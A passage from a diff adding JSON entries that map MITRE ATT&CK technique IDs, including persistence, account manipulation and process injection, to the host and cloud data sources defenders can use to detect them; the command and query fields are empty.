"data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + 
"https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1546", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + 
"relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface 
and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "wmi", + "definition": "Information about objects from system classes (such as providers, filters, and consumers) that support Windows Management Instrumentation (WMI) activitites.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "wmi creation", + "description": "A WMI object (filter, consumer, subscription, binding, provider) was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "wmi object" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-system-classes", + "https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-architecture" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + 
"https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1098.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "requested modification of", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "service principal" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "enabled", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "disabled", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "locked", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "unlocked", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "granted access to", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "removed access from", + "target_data_element": "user" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ] + ] + }, + { + "technique_id": "T1098.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "group", + "definition": "Information about collections of accounts or permissions within an organization.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "group modification", + "description": "A group was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "group" + }, + { + "data_source": "group", + "definition": "Information about collections of accounts or permissions within an organization.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "group modification", + "description": "A group was modified.", + "source_data_element": "user", + "relationship": "added", + "target_data_element": "user" + }, + { + "data_source": "group", + "definition": "Information about collections of accounts or permissions within an organization.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ 
+ "Windows", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "group modification", + "description": "A group was modified.", + "source_data_element": "user", + "relationship": "removed", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "requested modification of", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "service principal" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "enabled", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "disabled", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "locked", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "unlocked", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "granted access to", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "removed access from", + "target_data_element": "user" + } + ], + "external_reference": [ + [ + "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ] + ] + }, + { + "technique_id": "T1055.013", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be 
managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1055.011", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + 
"external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1055.014", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + 
"https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1055.009", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1055.008", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + 
"collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1055.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", 
